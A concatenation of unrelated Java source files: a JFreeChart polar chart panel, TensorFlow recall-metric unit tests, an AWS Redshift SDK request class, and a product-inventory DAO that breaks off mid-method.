zoomOut.setActionCommand(POLAR_ZOOM_OUT_ACTION_COMMAND);
zoomOut.addActionListener(this);
JMenuItem auto = new JMenuItem("Auto Range");
auto.setActionCommand(POLAR_AUTO_RANGE_ACTION_COMMAND);
auto.addActionListener(this);
if (zoomInIndex != -1) {
result.remove(zoomInIndex);
}
else {
zoomInIndex = result.getComponentCount() - 1;
}
result.add(zoomIn, zoomInIndex);
if (zoomOutIndex != -1) {
result.remove(zoomOutIndex);
}
else {
zoomOutIndex = zoomInIndex + 1;
}
result.add(zoomOut, zoomOutIndex);
if (autoIndex != -1) {
result.remove(autoIndex);
}
else {
autoIndex = zoomOutIndex + 1;
}
result.add(auto, autoIndex);
}
return result;
}
/**
* Handles action events generated by the popup menu.
*
* @param event the event.
*/
public void actionPerformed(ActionEvent event) {
String command = event.getActionCommand();
if (command.equals(POLAR_ZOOM_IN_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.zoom(0.5);
}
else if (command.equals(POLAR_ZOOM_OUT_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.zoom(2.0);
}
else if (command.equals(POLAR_AUTO_RANGE_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.getAxis().setAutoRange(true);
}
else {
super.actionPerformed(event);
}
}
// ----------------------
// --- Public Methods ---
// ----------------------
// -----------------------
// --- Private Methods ---
// -----------------------
/**
 * Checks that the chart's plot is a {@link PolarPlot}; otherwise an
 * <code>IllegalArgumentException</code> is thrown.
*
* @param chart the chart.
*/
private void checkChart(JFreeChart chart) {
Plot plot = chart.getPlot();
if (!(plot instanceof PolarPlot)) {
throw new IllegalArgumentException("plot is not a PolarPlot");
}
}
/**
* Returns the index of an item in a popup menu.
*
* @param menu the menu.
* @param text the label.
*
* @return The item index.
*/
private int getPopupMenuItem(JPopupMenu menu, String text) {
int index = -1;
for (int i = 0; (index == -1) && (i < menu.getComponentCount()); i++) {
Component comp = menu.getComponent(i);
if (comp instanceof JMenuItem) {
JMenuItem item = (JMenuItem) comp;
if (text.equals(item.getText())) {
index = i;
}
}
}
return index;
}
}
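// ---------------------------------------------------------------------------
// Illustrative sketch (not part of the original JFreeChart source): wraps a
// polar chart created via ChartFactory in a PolarChartPanel so the
// polar-specific popup menu items above are installed. The series values are
// arbitrary demo data (angle in degrees, radius).
// ---------------------------------------------------------------------------
class PolarChartPanelUsageSketch {
    static PolarChartPanel createDemoPanel() {
        org.jfree.data.xy.XYSeries series = new org.jfree.data.xy.XYSeries("Demo");
        series.add(0.0, 2.0);
        series.add(90.0, 4.0);
        series.add(180.0, 3.0);
        org.jfree.data.xy.XYSeriesCollection dataset
                = new org.jfree.data.xy.XYSeriesCollection(series);
        JFreeChart chart = ChartFactory.createPolarChart(
                "Polar Demo", dataset, true, true, false);
        return new PolarChartPanel(chart);
    }
}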
|
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=======================================================================*/
package org.tensorflow.framework.metrics;
import static org.junit.jupiter.api.Assertions.assertThrows;
import java.util.Random;
import org.junit.jupiter.api.Test;
import org.tensorflow.Operand;
import org.tensorflow.framework.utils.TestSession;
import org.tensorflow.ndarray.Shape;
import org.tensorflow.op.Op;
import org.tensorflow.op.Ops;
import org.tensorflow.types.TFloat32;
public class RecallTest {
private final TestSession.Mode tfMode = TestSession.Mode.GRAPH;
private final Random random = new Random();
@Test
public void testValueIsIdempotent() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.3f, 0.72f}, 1001L, TFloat32.class);
Operand<TFloat32> predictions =
tf.random.statelessRandomUniform(
tf.constant(Shape.of(10, 3)), tf.constant(new long[] {1L, 0L}), TFloat32.class);
Operand<TFloat32> labels =
tf.random.statelessRandomUniform(
tf.constant(Shape.of(10, 3)), tf.constant(new long[] {1L, 0L}), TFloat32.class);
Op update = instance.updateState(tf, labels, predictions, null);
for (int i = 0; i < 10; i++) session.run(update);
Operand<TFloat32> initialRecall = instance.result(tf, TFloat32.class);
for (int i = 0; i < 10; i++)
session.evaluate(initialRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweighted() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0, 1, 0}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
}
}
private int[][] generateRandomArray(int dim1, int dim2, int maxInt) {
int[][] result = new int[dim1][dim2];
for (int i = 0; i < dim1; i++) {
for (int j = 0; j < dim2; j++) {
result[i][j] = random.nextInt(maxInt);
}
}
return result;
}
@Test
public void testUnweightedAllIncorrect() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
int[][] array = generateRandomArray(100, 1, 2);
Operand<TFloat32> predictions = tf.dtypes.cast(tf.constant(array), TFloat32.class);
Operand<TFloat32> labels =
tf.dtypes.cast(tf.math.sub(tf.constant(1), tf.constant(array)), TFloat32.class);
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeighted() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions =
tf.constant(
new float[][] {
{1, 0, 1, 0},
{0, 1, 0, 1}
});
Operand<TFloat32> labels =
tf.constant(
new float[][] {
{0, 1, 1, 0},
{1, 0, 0, 1}
});
Operand<TFloat32> sampleWeights =
tf.constant(
new float[][] {
{1, 2, 3, 4},
{4, 3, 2, 1}
});
Op update = instance.updateState(tf, labels, predictions, sampleWeights);
session.run(update);
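// Recall = weighted true positives / weighted actual positives.
// True positives: label-1 positions predicted as 1 -> row 0 col 2 (weight 3)
// and row 1 col 3 (weight 1). Actual positives: row 0 cols 1,2 (weights 2,3)
// and row 1 cols 0,3 (weights 4,1).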
float weightedTp = 3.0f + 1.0f;
float weightedT = (2.0f + 3.0f) + (4.0f + 1.0f);
float expectedRecall = weightedTp / weightedT;
session.evaluate(expectedRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testDivByZero() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[] {0, 0, 0, 0});
Operand<TFloat32> labels = tf.constant(new float[] {0, 0, 0, 0});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedWithThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 0.7f}, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0, 0.6f, 0}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
Float[] expected = new Float[] {0.5f, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeightedWithThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 1.f}, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1}, {1, 0}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0}, {0.6f, 0}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4}, {3, 2}});
Op update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
float weightedTp = 0 + 3.f;
float weightedPositives = (0 + 3.f) + (4.f + 0.f);
float expectedRecall = weightedTp / weightedPositives;
float[] expected = new float[] {expectedRecall, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testMultipleUpdates() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 1.f}, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1}, {1, 0}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0}, {0.6f, 0}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4}, {3, 2}});
Op update = instance.updateState(tf, labels, predictions, weights);
for (int i = 0; i < 2; i++) session.run(update);
float weightedTp = (0f + 3.f) + (0f + 3.f);
float weightedPositives = ((0f + 3.f) + (4.f + 0.f)) + ((0f + 3.f) + (4.f + 0.f));
float expectedRecall = weightedTp / weightedPositives;
float[] expected = new float[] {expectedRecall, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedTopK() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 3, null, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0f, 1f, 1f, 0f, 0f}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.5f, 0f, 0.2f}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeightedTopK() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 3, null, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 1}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.4f, 0f, 0.2f}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4, 2, 3, 5}});
Op update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
labels = tf.constant(new float[][] {{1, 0, 1, 1, 1}});
predictions = tf.constant(new float[][] {{0.2f, 0.6f, 0.4f, 0.2f, 0.2f}});
weights = tf.constant(3.f);
update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
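// With top-k (k = 3) only the three highest predictions per row count as
// predicted positives; recall is weighted TP / weighted label-1 entries.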
float weightedTp = (2 + 5) + (3 + 3);
float weightedPositives = (4 + 2 + 5) + (3 + 3 + 3 + 3);
float expectedRecall = weightedTp / weightedPositives;
session.evaluate(expectedRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedClassId() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, null, 2, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.6f, 0f, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(1f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(0f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0f, 0f, 0.2f}});
labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.6f, 0f, 0.2f}});
labels = tf.constant(new float[][] {{0, 1, 0, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
}
}
@Test
public void testUnweightedTopKAndClassId() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 2, 2, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.6f, 0.3f, 0, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(1f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(0f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{1, 1, 0.9f, 1, 1}});
labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
}
}
@Test
public void testUnweightedTopKAndThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, 0.7f, 2, null, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.8f, 0.6f, 0f, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{1, 1, 1, 0, 1}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.25f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(3f, instance.getFalseNegatives());
}
}
@Test
public void testEagerEnvironment() {
try (TestSession session = TestSession.createTestSession(TestSession.Mode.EAGER)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, 0.7f, 2, null, 1001L, TFloat32.class);
assertThrows(IllegalArgumentException.class, () -> instance.updateState(tf, null, null));
}
}
}
|
|
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.redshift.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.AmazonWebServiceRequest;
/**
* <p/>
*
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/ResetClusterParameterGroup"
* target="_top">AWS API Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class ResetClusterParameterGroupRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable {
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*/
private String parameterGroupName;
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*/
private Boolean resetAllParameters;
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*/
private com.amazonaws.internal.SdkInternalList<Parameter> parameters;
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @param parameterGroupName
* The name of the cluster parameter group to be reset.
*/
public void setParameterGroupName(String parameterGroupName) {
this.parameterGroupName = parameterGroupName;
}
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @return The name of the cluster parameter group to be reset.
*/
public String getParameterGroupName() {
return this.parameterGroupName;
}
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @param parameterGroupName
* The name of the cluster parameter group to be reset.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameterGroupName(String parameterGroupName) {
setParameterGroupName(parameterGroupName);
return this;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @param resetAllParameters
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public void setResetAllParameters(Boolean resetAllParameters) {
this.resetAllParameters = resetAllParameters;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @return If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public Boolean getResetAllParameters() {
return this.resetAllParameters;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @param resetAllParameters
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withResetAllParameters(Boolean resetAllParameters) {
setResetAllParameters(resetAllParameters);
return this;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @return If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public Boolean isResetAllParameters() {
return this.resetAllParameters;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @return An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
*/
public java.util.List<Parameter> getParameters() {
if (parameters == null) {
parameters = new com.amazonaws.internal.SdkInternalList<Parameter>();
}
return parameters;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
*/
public void setParameters(java.util.Collection<Parameter> parameters) {
if (parameters == null) {
this.parameters = null;
return;
}
this.parameters = new com.amazonaws.internal.SdkInternalList<Parameter>(parameters);
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
* <p>
* <b>NOTE:</b> This method appends the values to the existing list (if any). Use
* {@link #setParameters(java.util.Collection)} or {@link #withParameters(java.util.Collection)} if you want to
* override the existing values.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameters(Parameter... parameters) {
if (this.parameters == null) {
setParameters(new com.amazonaws.internal.SdkInternalList<Parameter>(parameters.length));
}
for (Parameter ele : parameters) {
this.parameters.add(ele);
}
return this;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
     *        least one parameter name must be supplied.
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameters(java.util.Collection<Parameter> parameters) {
setParameters(parameters);
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getParameterGroupName() != null)
sb.append("ParameterGroupName: ").append(getParameterGroupName()).append(",");
if (getResetAllParameters() != null)
sb.append("ResetAllParameters: ").append(getResetAllParameters()).append(",");
if (getParameters() != null)
sb.append("Parameters: ").append(getParameters());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof ResetClusterParameterGroupRequest == false)
return false;
ResetClusterParameterGroupRequest other = (ResetClusterParameterGroupRequest) obj;
if (other.getParameterGroupName() == null ^ this.getParameterGroupName() == null)
return false;
if (other.getParameterGroupName() != null && other.getParameterGroupName().equals(this.getParameterGroupName()) == false)
return false;
if (other.getResetAllParameters() == null ^ this.getResetAllParameters() == null)
return false;
if (other.getResetAllParameters() != null && other.getResetAllParameters().equals(this.getResetAllParameters()) == false)
return false;
if (other.getParameters() == null ^ this.getParameters() == null)
return false;
if (other.getParameters() != null && other.getParameters().equals(this.getParameters()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getParameterGroupName() == null) ? 0 : getParameterGroupName().hashCode());
hashCode = prime * hashCode + ((getResetAllParameters() == null) ? 0 : getResetAllParameters().hashCode());
hashCode = prime * hashCode + ((getParameters() == null) ? 0 : getParameters().hashCode());
return hashCode;
}
@Override
public ResetClusterParameterGroupRequest clone() {
return (ResetClusterParameterGroupRequest) super.clone();
}
}
|
|
package funcoes;
import atributos.Produto;
import java.sql.CallableStatement;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
*
* @author graciele
*/
public class ProdutoDAO {
private static int codDetProduto;
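    // Inserts a new product row into tabproduto and returns its generated id.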
public static int Cadroduto(Produto prod){
int id = 0;
PreparedStatement stmt;
try {
String sql = ("INSERT INTO tabproduto(tabusuario_id_usuario, "
+ " produto) " +
" VALUES(?,?);");
stmt = Conexao.getConnection().prepareStatement(sql);
stmt.setInt(1, prod.getIdUsuario());
stmt.setString(2, prod.getProduto());
stmt.executeUpdate();
ResultSet rs = stmt.getGeneratedKeys();
if (rs.next()) {
id = rs.getInt(1);
}
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Cadastrar Produto: ",ex);
}
return id;
}
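    // Inserts the stock/price detail row for an existing product into tabdetproduto and returns its generated id.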
public static int CadDetProduto(Produto prod){
PreparedStatement stmt;
int id = 0;
try {
String sql = ("INSERT INTO tabdetproduto(tabproduto_id_prod, " +
" quantidade, " +
" precoEntrada, " +
" precoSaida, " +
" quantidadeMinima, " +
" tabModelo_idtabModelo, " +
" dataCadastro, " +
" tabFabricante_idtabFabricante) " +
" VALUES(?,?,?,?,?,?,?,?);");
            // Ask the driver for the generated key so getGeneratedKeys() below returns the new id.
            stmt = Conexao.getConnection().prepareStatement(sql, Statement.RETURN_GENERATED_KEYS);
stmt.setInt(1, prod.getCodProduto());
stmt.setInt(2, prod.getQuantidade());
stmt.setDouble(3 , prod.getPrecoEntrada());
stmt.setDouble(4, prod.getPrecoSaida());
stmt.setInt(5, prod.getQuantidadeMinima());
stmt.setInt(6, prod.getCodModelo());
stmt.setObject(7, prod.getDataCadProduto());
stmt.setInt(8, prod.getCodFabricante());
stmt.executeUpdate();
ResultSet rs = stmt.getGeneratedKeys();
if (rs.next()) {
id = rs.getInt(1);
}
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Cadastrar detalhe do Produto: ",ex);
}
return id;
}
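    // Loads a product together with its detail rows (tabproduto joined with tabdetproduto) by product id.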
public static ArrayList CarregaProduto(int id) {
Statement stmt;
ArrayList<Produto> produto = new ArrayList<Produto>();
try {
String Sql = "SELECT * FROM tabproduto "
+ " INNER JOIN tabdetproduto ON "
+ " tabproduto_id_prod = id_prod "
+ " WHERE id_prod = " + id + ";";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
Produto p = new Produto();
p.setIdProduto(rs.getInt("id_prod"));
p.setIdUsuario(rs.getInt("tabusuario_id_usuario"));
p.setProduto(rs.getString("produto"));
p.setCodProduto(rs.getInt("tabproduto_id_prod"));
p.setIdDetProduto(rs.getInt("idDetProduto"));
p.setQuantidade(rs.getInt("quantidade"));
p.setPrecoEntrada(rs.getDouble("precoEntrada"));
p.setPrecoSaida(rs.getDouble("precoSaida"));
p.setQuantidadeMinima(rs.getInt("quantidadeMinima"));
p.setCodModelo(rs.getInt("tabModelo_idtabModelo"));
p.setDataCadProduto(rs.getDate("dataCadastro"));
p.setCodFabricante(rs.getInt("tabFabricante_idtabFabricante"));
p.setIdProduto(id);
produto.add(p);
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao carregar os dados do Produto: ", ex);
}
return produto;
}
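    // Checks tabproduto for the given id and returns it when a matching row exists.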
public static int idProduto(int id) {
Statement stmt;
Produto p = new Produto();
try {
String Sql = "SELECT id_prod FROM tabproduto WHERE id_prod = '"+ id +"';";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
p.setIdProduto(rs.getInt("id_prod"));
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao pegar id do Produto: ", ex);
}
return p.getIdProduto();
}
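    // Deletes a product through the ExcluirProduto stored procedure.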
public static void ExcluirProduto(int id){
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call ExcluirProduto(?)}");
stmt.setInt(1, id);
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao excluir os dados do Produto: ",ex);
}
}
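    // Updates a product's name, stock and pricing data through the UpdateProduto stored procedure.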
public static void UpdateProduto(Produto prod, int id){
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call UpdateProduto(?,?,?,?,?,?,?)}");
stmt.setInt(1, id);
stmt.setString(2, prod.getProduto());
stmt.setInt(3, prod.getQuantidade());
stmt.setDouble(4 , prod.getPrecoEntrada());
stmt.setDouble(5, prod.getPrecoSaida());
stmt.setInt(6, prod.getCodModelo());
stmt.setInt(7, prod.getCodFabricante());
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao excluir os dados do Produto: ",ex);
}
}
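    // Adds stock for a product through the AdicionaEstoque stored procedure.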
public static void AlterarEstoque(Produto prod, int id) {
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call AdicionaEstoque(?,?,?,?,?)}");
stmt.setInt(1, id);
stmt.setInt(2, prod.getQuantidade());
stmt.setDouble(3 , prod.getPrecoEntrada());
stmt.setDouble(4, prod.getPrecoSaida());
stmt.setObject(5, prod.getDataCadProduto());
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao adicionar produto no estoque: ",ex);
}
}
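    // Persists the new quantity for a tabdetproduto row (used when decreasing stock).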
public static void BaixaEstoque(int quant, int id) {
PreparedStatement stmt;
try {
String sql = ("UPDATE tabdetproduto SET quantidade = '" + quant
+ "' where idDetProduto = '" + id + "';");
stmt = Conexao.getConnection().prepareStatement(sql);
stmt.executeUpdate();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao dar baixa no estoque: ", ex);
}
}
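    // Lists the names of all registered products.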
public static ArrayList<Produto> ListarProdutos(){
Statement stmt;
ArrayList<Produto> produto = new ArrayList<Produto>();
try {
String Sql = "SELECT produto FROM tabproduto ;";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
Produto p = new Produto();
p.setProduto(rs.getString("produto"));
produto.add(p);
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao carregar os dados do Produto: ", ex);
}
return produto;
}
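    // Returns the tabdetproduto id captured by the most recent ExisteProduto() call.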
public static int codDetProduto() {
return codDetProduto;
}
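    // Returns the sale price (precoSaida) for the given product/model/manufacturer combination, or 0 when not
    // found, and remembers the matching detail id for codDetProduto().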
public static double ExisteProduto(int idProduto, int idModelo, int idFabricante) {
Statement stmt;
double valor = 0;
try {
String Sql = "SELECT * FROM vw_combofabricanteproduto "
+ " WHERE id_prod = " + idProduto
+ " AND tabmodelo_idtabModelo = " + idModelo
+ " AND idtabFabricante = " + idFabricante +";";
